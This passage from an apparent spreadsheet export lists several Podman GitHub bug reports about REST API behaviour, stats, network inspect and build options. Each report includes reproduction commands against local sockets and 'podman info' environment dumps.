swapTotal: 2147479552 uptime: 1h 10m 20.19s (Approximately 0.04 days) plugins: log: - k8s-file - none - journald network: - bridge - macvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /home/bryce/.config/containers/storage.conf containerStore: number: 11 paused: 0 running: 3 stopped: 8 graphDriverName: overlay graphOptions: {} graphRoot: /home/bryce/.local/share/containers/storage graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageStore: number: 59 runRoot: /run/user/1000/containers volumePath: /home/bryce/.local/share/containers/storage/volumes version: APIVersion: 3.4.2 Built: 0 BuiltTime: Wed Dec 31 18:00:00 1969 GitCommit: "" GoVersion: go1.15.2 OsArch: linux/amd64 Version: 3.4.2  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  apt list podman Listing Done podman/unknown,now 100:3.4.2-5 amd64 [installed] podman/unknown 100:3.4.2-5 arm64 podman/unknown 100:3.4.2-5 armhf podman/unknown 100:3.4.2-5 s390x  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes **Additional environment details (AWS, VirtualBox, physical, etc.):** VirtualBox 6.1</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14498</t>
  </si>
  <si>
    <t>container state improper 409 - via stats endpoint for container in created state</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** - Its not possible to attach to stats API endpoint via `/container/{id}/stats` if the container is created via `/containers/create` endpoint and is in created/initialized state. Same applies for CLI (`podman stats {id}`). - Its working for Docker 20.10.13 &lt;!-- Briefly describe the problem you are having in a few paragraphs. --&gt; **Steps to reproduce the issue:** 1. `containerid=$(curl -s --unix-socket /run/podman/podman.sock -X POST -H "Content-Type: application/json" -d @payload.json "http://d/containers/create" | jq -r .Id)` 2. `curl -s --unix-socket /run/podman/podman.sock -X GET http://d/containers/$containerid/stats` **Describe the results you received:** Response from step2 `{"cause":"container state improper","message":"container state improper","response":409}` **Describe the results you expected:** Empty stats are streamed   {"read":"0001-01-01T00:00:00Z","preread":"0001-01-01T00:00:00Z","pids_stats":{},"blkio_stats":{"io_service_bytes_recursive":null,"io_serviced_recursive":null,"io_queue_recursive":null,"io_service_time_recursive":null,"io_wait_time_recursive":null,"io_merged_recursive":null,"io_time_recursive":null,"sectors_recursive":null},"num_procs":0,"storage_stats":{},"cpu_stats":{"cpu_usage":{"total_usage":0,"usage_in_kernelmode":0,"usage_in_usermode":0},"throttling_data":{"periods":0,"throttled_periods":0,"throttled_time":0}},"precpu_stats":{"cpu_usage":{"total_usage":0,"usage_in_kernelmode":0,"usage_in_usermode":0},"throttling_data":{"periods":0,"throttled_periods":0,"throttled_time":0}},"memory_stats":{},"name":"/pensive_sanderson","id":"3fb3108ac3ed8e0d41062889e6f442bc79b03b73d78f6a93d0a469324acbdabf"} {"read":"0001-01-01T00:00:00Z","preread":"0001-01-01T00:00:00Z","pids_stats":{},"blkio_stats":{"io_service_bytes_recursive":null,"io_serviced_recursive":null,"io_queue_recursive":null,"io_service_time_recursive":null,"io_wait_time_recursive":null,"io_merged_recursive":null,"io_time_recursive":null,"sectors_recursive":null},"num_procs":0,"storage_stats":{},"cpu_stats":{"cpu_usage":{"total_usage":0,"usage_in_kernelmode":0,"usage_in_usermode":0},"throttling_data":{"periods":0,"throttled_periods":0,"throttled_time":0}},"precpu_stats":{"cpu_usage":{"total_usage":0,"usage_in_kernelmode":0,"usage_in_usermode":0},"throttling_data":{"periods":0,"throttled_periods":0,"throttled_time":0}},"memory_stats":{},"name":"/pensive_sanderson","id":"3fb3108ac3ed8e0d41062889e6f442bc79b03b73d78f6a93d0a469324acbdabf"}   **Additional information you deem important (e.g. issue happens only occasionally):** - Podman CLI returns:  podman stats $containerid Error: entities.ContainerStatsReport.Error: decode non empty interface: can not unmarshal into nil, error found in #9 byte of |{"Error":{},"Stats"|, bigger context |{"Error":{},"Stats":null}  **Output of `podman version`:**  Client: Podman Engine Version: 4.0.2 API Version: 4.0.2 Go Version: go1.18beta2 Built: Thu Mar 3 14:56:09 2022 OS/Arch: linux/amd64  **Output of `podman info --debug`:**  (paste your output here)host: arch: amd64 buildahVersion: 1.24.1 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.0-2.fc36.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.0, commit: ' cpus: 8 distribution: distribution: fedora variant: coreos version: "36" eventLogger: journald hostname: ip-10-2-17-77 idMappings: gidmap: null uidmap: null kernel: 5.17.5-300.fc36.x86_64 linkmode: dynamic logDriver: journald memFree: 13253181440 memTotal: 32935444480 networkBackend: netavark ociRuntime: name: crun package: crun-1.4.4-1.fc36.x86_64 path: /usr/bin/crun version: |- crun version 1.4.4 commit: 6521fcc5806f20f6187eb933f9f45130c86da230 spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux remoteSocket: exists: true path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-0.2.beta.0.fc36.x86_64 version: |- slirp4netns version 1.2.0-beta.0 commit: 477db14a24ff1a3de3a705e51ca2c4c1fe3dda64 libslirp: 4.6.1 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.3 swapFree: 0 swapTotal: 0 uptime: 96h 0m 0.13s (Approximately 4.00 days) plugins: log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: search: - docker.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 12 paused: 0 running: 3 stopped: 9 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 26 runRoot: /run/containers/storage volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.0.2 Built: 1646319369 BuiltTime: Thu Mar 3 14:56:09 2022 GitCommit: "" GoVersion: go1.18beta2 OsArch: linux/amd64 Version: 4.0.2  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  podman-4.0.2-1.fc36.x86_64  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** No **Additional environment details (AWS, VirtualBox, physical, etc.):** - AWS - Fedora CoreOS 36.20220505.3.2</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14647</t>
  </si>
  <si>
    <t>containers list api route response header is text/plain instead of application/json</t>
  </si>
  <si>
    <t>/kind bug **Description** Response content-type header is not `application/json` for containers list endpoint, although negotiation requests it. Some client libraries do attempt deserializing automatically to their data structures. Although it can be mitigated as an exception for this route, it should respect the negotiation. (v3 and v4 have the same behavior) **Steps to reproduce the issue:** 1. base url `v3.0.0` - `curl -v -X GET --unix-socket "/run/user/1000/podman/podman.sock" "http://d/v3.0.0/libpod/containers/json" -H "Accept: application/json" -H "Content-Type: application/json"` 2. base url `v4.0.0` - `curl -v -X GET --unix-socket "/run/user/1000/podman/podman.sock" "http://d/v4.0.0/libpod/containers/json" -H "Accept: application/json" -H "Content-Type: application/json"` **Describe the results you received:**  &gt; GET /v4.0.0/libpod/containers/json HTTP/1.1  &lt; Content-Type: text/plain; charset=us-ascii &lt; Libpod-Api-Version: 4.1.0   **Describe the results you expected:**  &gt; GET /v4.0.0/libpod/containers/json HTTP/1.1  &lt; Content-Type: application/json; charset=us-ascii &lt; Libpod-Api-Version: 4.1.0   If any use, issued the same for docker api and it does have `application/json` as response content-type header  docker --version Docker version 20.10.16, build aa7e414fdc   curl -v -X GET --unix-socket "/var/run/docker.sock" "http://localhost/containers/json" -H "Accept: application/json" -H "Content-Type: application/json" Note: Unnecessary use of -X or --request, GET is already inferred. * Trying /var/run/docker.sock:0 * Connected to localhost (/run/docker.sock) port 80 (#0) &gt; GET /containers/json HTTP/1.1 &gt; Host: localhost &gt; User-Agent: curl/7.83.1 &gt; Accept: application/json &gt; Content-Type: application/json &gt; * Mark bundle as not supporting multiuse &lt; HTTP/1.1 200 OK &lt; Api-Version: 1.41 &lt; Content-Type: application/json &lt; Docker-Experimental: false &lt; Ostype: linux &lt; Server: Docker/20.10.16 (linux) &lt; Date: Fri, 17 Jun 2022 15:57:22 GMT &lt; Transfer-Encoding: chunked  &gt; IMPORTANT EDIT - It only happens when the list of containers is empty, as soon as at least one is present it respects!</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14674</t>
  </si>
  <si>
    <t>discrepancy in podman network inspect for netmask (compat API)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** podman main: The netmask of secondaryIPAddresses/SecondaryIPv6Addresses in container network inspect compat API is always zero. podman v3: Wrong type used for secondaryIPAddresses/SecondaryIPv6Addresses (string instead of network.Address) results in broken container inspect compat API in presence of secondary network interfaces. **Steps to reproduce the issue:** Reproduction in **main** branch 1. create a named network namespace and setup two veth interface  ip netns add test ip netns exec test /bin/bash ip link add enp2s0 type veth peer name eth0 ip addr add 10.0.1.0/24 dev eth0 ip link set eth0 up ip link add enp2s1 type veth peer name eth1 ip addr add 10.0.2.0/24 dev eth1 ip link set eth1 up exit  2. run a container and join the created network namespace  podman run --net ns:/run/netns/test --name test -it alpine /bin/sh  3. start a podman service  podman system service tcp:localhost:20000 --log-level=debug --time=0  4. Check output of podman inspect test  curl -X GET 'http://127.0.0.1:20000/v3.0.0/containers/test/json'| jq  **Describe the results you received:** PrefixLen is **0**  "NetworkSettings": { "Bridge": "", "SandboxID": "", "HairpinMode": false, "LinkLocalIPv6Address": "", "LinkLocalIPv6PrefixLen": 0, "Ports": {}, "SandboxKey": "", "SecondaryIPAddresses": [ { "Addr": "10.0.2.0", "PrefixLen": 0 }  **Describe the results you expected:** PrefixLen should be **24** **Output of `podman version`:**  podman version 4.0.0-dev  **Output of `podman info --debug`:**  host: arch: amd64 buildahVersion: 1.24.1 cgroupControllers: - cpuset - cpu - cpuacct - blkio - memory - devices - freezer - net_cls - perf_event - net_prio - pids cgroupManager: systemd cgroupVersion: v1 conmon: package: conmon-2.0.27+git0+3efab3e71c-r0.core2_64 path: /usr/bin/conmon version: 'conmon version 2.0.28-dev, commit: 3efab3e71c4c29f127cd7b8e8a5a885fc17dec88' cpus: 6 distribution: distribution: mbient version: "1.0" eventLogger: journald hostname: qemux86-64 idMappings: gidmap: null uidmap: null kernel: 5.10.30-yocto-standard linkmode: dynamic logDriver: journald memFree: 7883513856 memTotal: 22187085824 networkBackend: cni ociRuntime: name: crun package: crun-0.18+gitf302dd8c02c6fddd2c50d1685d82b7a19aae8afe-r0.core2_64 path: /usr/bin/crun version: |- crun version 0.19.5-f302-dirty commit: f302dd8c02c6fddd2c50d1685d82b7a19aae8afe spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +YAJL os: linux remoteSocket: path: /run/podman/podman.sock security: apparmorEnabled: true capabilities: CAP_AUDIT_WRITE,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_MKNOD,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: "" selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-0.4.1-r0.core2_64 version: |- slirp4netns version 0.4.1 commit: unknown swapFree: 46133248 swapTotal: 46133248 uptime: 6h 6m 42.11s (Approximately 0.25 days) plugins: log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io - registry.fedoraproject.org - quay.io - registry.access.redhat.com - registry.centos.org store: configFile: /etc/containers/storage.conf containerStore: number: 6 paused: 0 running: 3 stopped: 3 graphDriverName: overlay graphOptions: overlay.mountopt: nodev graphRoot: /mnt/systemdata/dynamic-contents/podman graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 2 runRoot: /var/run/containers/storage volumePath: /mnt/systemdata/dynamic-contents/podman/volumes version: APIVersion: 4.0.0-dev Built: 1655756421 BuiltTime: Mon Jun 20 22:20:21 2022 GitCommit: 192dea7d981443a8091596eb91e6c4274b8a6f85 GoVersion: go1.18.3 OsArch: linux/amd64 Version: 4.0.0-dev  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14676</t>
  </si>
  <si>
    <t>Wrong memory limit stats from podman's remote stats API</t>
  </si>
  <si>
    <t xml:space="preserve"> Description `podman` remote stats API reports wrong "memory_limit" stats for memory-limited container when the container is launched with `crun`. I am not sure whether the issue comes from `podman` or `crun`, but decided to report here because the issue is gone if I change the runtime to `runc`.  How to reproduce 1. Run **rootful** podman API daemon  podman system service -t 0 tcp:127.0.0.1:12345  2. Launch a container with latest `crun` runtime with memory limit  podman run --rm -it -m 512m --runtime=/crun-1.4.5-linux-amd64 --name test busybox  3. Check the output from `podman`'s remote stats API  curl http://127.0.0.1:12345/containers/test/stats?stream=false  4. Confirm that `memory_stats.limit` is wrongly reported.  { "read": "2022-06-21T05:27:32.81008054Z", "preread": "0001-01-01T00:00:00Z", "pids_stats": , "blkio_stats": , "num_procs": , "storage_stats": , "cpu_stats": ,, "precpu_stats": , "memory_stats": { "usage": 589824, "max_usage": 18446744073709551615, "limit": 18446744073709551615 }, "name": "test", "Id": , "networks":  }  5. Repeat the same procedure with `runc` runtime  podman run --rm -it -m 512m --runtime=/home/ubuntu/runc-1.1.3.amd64 --name test busybox  6. Confirm that `memory_stats.limit` is correctly reported.  { "read": "2022-06-21T05:33:54.710659699Z", "preread": "0001-01-01T00:00:00Z", "pids_stats": , "blkio_stats": , "num_procs": , "storage_stats": , "cpu_stats": ,, "precpu_stats": , "memory_stats": { "usage": 335872, "max_usage": 536870912, "limit": 536870912 }, "name": "test", "Id": , "networks":  }   Environment  root@machine:/home/ubuntu# podman info host: arch: amd64 buildahVersion: 1.23.1 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - rdma - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: 'conmon: /usr/bin/conmon' path: /usr/bin/conmon version: 'conmon version 2.0.25, commit: unknown' cpus: 16 distribution: codename: jammy distribution: ubuntu version: "22.04" eventLogger: journald hostname: {maksed} idMappings: gidmap: null uidmap: null kernel: 5.15.0-1004-aws linkmode: dynamic logDriver: journald memFree: 1502658560 memTotal: 67403698176 ociRuntime: name: crun package: 'crun: /usr/bin/crun' path: /usr/bin/crun version: |- crun version 0.17 commit: 0e9229ae34caaebcb86f1fde18de3acaf18c6d9a spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +YAJL os: linux remoteSocket: exists: true path: /run/podman/podman.sock security: apparmorEnabled: true capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: 'slirp4netns: /usr/bin/slirp4netns' version: |- slirp4netns version 1.0.1 commit: 6a7b16babc95b6a3056b33fb45b74a6f62262dd4 libslirp: 4.6.1 swapFree: 0 swapTotal: 0 uptime: {maksed} plugins: log: - k8s-file - none - journald network: - bridge - macvlan volume: - local registries: {} store: configFile: /etc/containers/storage.conf containerStore: number: {maksed} paused: {maksed} running: {maksed} stopped: {maksed} graphDriverName: overlay graphOptions: {} graphRoot: /var/lib/containers/storage graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageStore: number: {maksed} runRoot: /run/containers/storage volumePath: /var/lib/containers/storage/volumes version: APIVersion: 3.4.4 Built: 0 BuiltTime: Thu Jan 1 00:00:00 1970 GitCommit: "" GoVersion: go1.17.3 OsArch: linux/amd64 Version: 3.4.4 </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14769</t>
  </si>
  <si>
    <t>Podman system df --format "{{json .}}" doesn't output "Size" and "Reclaimable" columns</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** &lt;!-- Briefly describe the problem you are having in a few paragraphs. --&gt; **Steps to reproduce the issue:** 1. podman system df 2. podman system df --format "{{json ." **Describe the results you received:** bash $ podman system df TYPE TOTAL ACTIVE SIZE RECLAIMABLE Images 89 5 59.2GB 57.58GB (97%) Containers 0 0 0B 0B (0%) Local Volumes 4 0 124MB 247.9MB (200%) $ podman system df --format "{{json ." {"Type":"Images","Total":89,"Active":5}} {"Type":"Containers","Total":0,"Active":0}} {"Type":"Local Volumes","Total":4,"Active":0}}  **Describe the results you expected:** The `podman system df --format "{{json ."` command should also output the `Size` and `Reclaimable` fields. **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  Client: Podman Engine Version: 4.1.1 API Version: 4.1.1 Go Version: go1.18.3 Built: Wed Jun 15 16:31:58 2022 OS/Arch: linux/amd64  **Output of `podman info --debug`:**  host: arch: amd64 buildahVersion: 1.26.1 cgroupControllers: - cpu - io - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.0-2.fc36.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.0, commit: ' cpuUtilization: idlePercent: 63.17 systemPercent: 5.89 userPercent: 30.95 cpus: 4 distribution: distribution: fedora variant: workstation version: "36" eventLogger: journald hostname: fedora idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 5.18.6-200.fc36.x86_64 linkmode: dynamic logDriver: journald memFree: 7157645312 memTotal: 16457158656 networkBackend: cni ociRuntime: name: crun package: crun-1.4.5-1.fc36.x86_64 path: /usr/bin/crun version: |- crun version 1.4.5 commit: c381048530aa750495cf502ddb7181f2ded5b400 spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux remoteSocket: path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-0.2.beta.0.fc36.x86_64 version: |- slirp4netns version 1.2.0-beta.0 commit: 477db14a24ff1a3de3a705e51ca2c4c1fe3dda64 libslirp: 4.6.1 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.3 swapFree: 8589930496 swapTotal: 8589930496 uptime: 24h 39m 39.32s (Approximately 1.00 days) plugins: log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - registry.centos.org - docker.io store: configFile: /home/joachim/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/joachim/.local/share/containers/storage graphRootAllocated: 748592037888 graphRootUsed: 119622201344 graphStatus: Backing Filesystem: btrfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 89 runRoot: /run/user/1000/containers volumePath: /home/joachim/.local/share/containers/storage/volumes version: APIVersion: 4.1.1 Built: 1655303518 BuiltTime: Wed Jun 15 16:31:58 2022 GitCommit: "" GoVersion: go1.18.3 Os: linux OsArch: linux/amd64 Version: 4.1.1  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  podman-4.1.1-1.fc36.x86_64  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes **Additional environment details (AWS, VirtualBox, physical, etc.):** Physical</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/14863</t>
  </si>
  <si>
    <t>Cirrus: new API clobbers past (flake) runs</t>
  </si>
  <si>
    <t>The new logformatter URL mechanism, after #14608, has a serious flaw: flake URLs are lost. Reason: the new URLs include the **BuildID**, and **TaskName**, but not the **TaskID**. TaskID is the crucial one for linking to a flake log. Without TaskID, we have something like `/build/12345/int this that`, but the `int this that` on a successful run clobbers the one of the flaked run. @cevich let's talk about this upon your return please.</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/15430</t>
  </si>
  <si>
    <t>podman system service uses different syntax to podman-remote for tcp connections</t>
  </si>
  <si>
    <t>/kind bug **Description** `podman system service` uses an inconsistent syntax for specifying the listen port compared to `podman --remote --connection` and does not error about it properly. **Steps to reproduce the issue:** 1. Try starting a podman system service on a tcp port with the syntax one would expect from the `--connection` syntax: `podman system service tcp://localhost:2375` **Describe the results you received:** The command appears to succeed, but no listening port on `2375` or any other is created. **Describe the results you expected:** The command should either error, explaining that the syntax is invalid, or better, actually work since the same pseudo-path like syntax is supported for remote connections. **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  Version: 3.4.4 API Version: 3.4.4 Go Version: go1.17.3 Built: Thu Jan 1 10:00:00 1970 OS/Arch: linux/amd64  **Output of `podman info`:**  host: arch: amd64 buildahVersion: 1.23.1 cgroupControllers: - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: 'conmon: /usr/bin/conmon' path: /usr/bin/conmon version: 'conmon version 2.0.25, commit: unknown' cpus: 16 distribution: codename: jammy distribution: ubuntu version: "22.04" eventLogger: file hostname: will-desktop idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 5.15.0-27-generic linkmode: dynamic logDriver: k8s-file memFree: 34020188160 memTotal: 67362914304 ociRuntime: name: runc package: 'runc: /usr/sbin/runc' path: /usr/sbin/runc version: |- runc version 1.1.0-0ubuntu1 spec: 1.0.2-dev go: go1.17.3 libseccomp: 2.5.3 os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: 'slirp4netns: /usr/bin/slirp4netns' version: |- slirp4netns version 1.0.1 commit: 6a7b16babc95b6a3056b33fb45b74a6f62262dd4 libslirp: 4.6.1 swapFree: 524283904 swapTotal: 524283904 uptime: 69h 14m 23.56s (Approximately 2.88 days) plugins: log: - k8s-file - none - journald network: - bridge - macvlan volume: - local registries: search: - docker.io store: configFile: /home/will/.config/containers/storage.conf containerStore: number: 43 paused: 0 running: 2 stopped: 41 graphDriverName: overlay graphOptions: overlay.mount_program: Executable: /usr/bin/fuse-overlayfs Package: 'fuse-overlayfs: /usr/bin/fuse-overlayfs' Version: |- fusermount3 version: 3.10.5 fuse-overlayfs: version 1.7.1 FUSE library version 3.10.5 using FUSE kernel interface version 7.31 graphRoot: /home/will/.local/share/containers/storage graphStatus: Backing Filesystem: zfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "false" imageStore: number: 524 runRoot: /run/user/1000/containers volumePath: /home/will/.local/share/containers/storage/volumes version: APIVersion: 3.4.4 Built: 0 BuiltTime: Thu Jan 1 10:00:00 1970 GitCommit: "" GoVersion: go1.17.3 OsArch: linux/amd64 Version: 3.4.4  **Package info (e.g. output of `rpm -q podman` or `apt list podman`):**  podman/jammy,now 3.4.4+ds1-1ubuntu1 amd64 [installed]  **Have you tested with the latest version of Podman and have you checked the Podman Troubleshooting Guide? (https://github.com/containers/podman/blob/main/troubleshooting.md)** Yes. The command exits, but still displays no error message or explanation as to why. **Additional environment details (AWS, VirtualBox, physical, etc.):** Physical</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/15476</t>
  </si>
  <si>
    <t>build from API or `podman-remote build` does not supports `--userns=auto` while it works with CLI</t>
  </si>
  <si>
    <t>User trying this implementation in Podman 4.2.0. Seems its working via CLI, but API call does not work. **Dockerfile**  cat &lt;&lt; EOF &gt; Dockerfile FROM alpine RUN cat /proc/self/uid_map EOF  Works correctly via CLI  podman build -t test --userns=auto .  Does not work via API  tar -czf context.tar.gz Dockerfile curl -s --unix-socket /run/podman/podman.sock -X POST -H "Content-Type:application/tar" --data-binary "@context.tar.gz" 'http://d/v4.2.0/libpod/build?userns=auto'  _Originally posted by @lukasmrtvy in https://github.com/containers/buildah/issues/4060#issuecomment-1226050854_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/15485</t>
  </si>
  <si>
    <t>invalid event on image removal + missing untag event from REST API</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** Removing an image should send a `delete` event but I'm receiving a `remove` event https://docs.docker.com/engine/api/v1.41/#tag/System/operation/SystemEvents states: Images report these events: `delete`, `import`, `load`, `pull`, `push`, `save`, `tag`, `untag`, and `prune` **Steps to reproduce the issue:** 1. pull an image with docker bash $ docker pull httpd  track events in a separate terminal  $ curl --unix-socket /var/run/docker.sock http:/v1.41/events  remove the image  $ docker rmi a981c8992512  look at the events  